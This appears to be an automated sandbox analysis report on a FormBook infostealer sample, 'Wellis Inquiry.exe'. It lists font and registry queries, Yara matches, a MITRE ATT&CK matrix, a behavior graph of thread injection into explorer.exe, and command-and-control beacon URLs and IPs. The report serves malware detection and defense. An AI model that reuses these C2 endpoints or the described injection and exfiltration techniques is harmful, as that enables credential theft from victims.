          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502627 Sample: Wellis Inquiry.exe Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 33 www.quickcarehomeopathic.com 2->33 35 parkingpage.namecheap.com 2->35 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 11 Wellis Inquiry.exe 3 2->11         started        signatures3 process4 process5 13 Wellis Inquiry.exe 11->13         started        signatures6 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 16 explorer.exe 13->16 injected process7 dnsIp8 27 www.marunouchi1.com 183.90.240.3, 49808, 80 SAKURA-CSAKURAInternetIncJP Japan 16->27 29 aceserial.xyz 151.106.117.36, 49818, 80 PLUSSERVER-ASN1DE Germany 16->29 31 9 other IPs or domains 16->31 37 System process connects to network (likely due to code injection or exploit) 16->37 39 Performs DNS queries to domains with low reputation 16->39 20 cmmon32.exe 16->20         started        signatures9 process10 signatures11 49 Self deletion via cmd delete 20->49 51 Modifies the context of a thread in another process (thread injection) 20->51 53 Maps a DLL or memory area into another process 20->53 55 Tries to detect virtualization through RDTSC time measurements 20->55 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Wellis Inquiry.exe9%ReversingLabsByteCode-MSIL.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.Wellis Inquiry.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/a-e0%URL Reputationsafe
          http://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/G0%URL Reputationsafe
          http://www.aceserial.xyz/ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.carterandcone.com/0%Avira URL Cloudsafe
          http://www.typography.net4?0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.carterandcone.comw.m0%Avira URL Cloudsafe
          http://www.typography.net0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/i0%Avira URL Cloudsafe
          www.psychedeliccosmetics.com/ag9v/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.carterandcone.comtal0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sakkal.comd0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
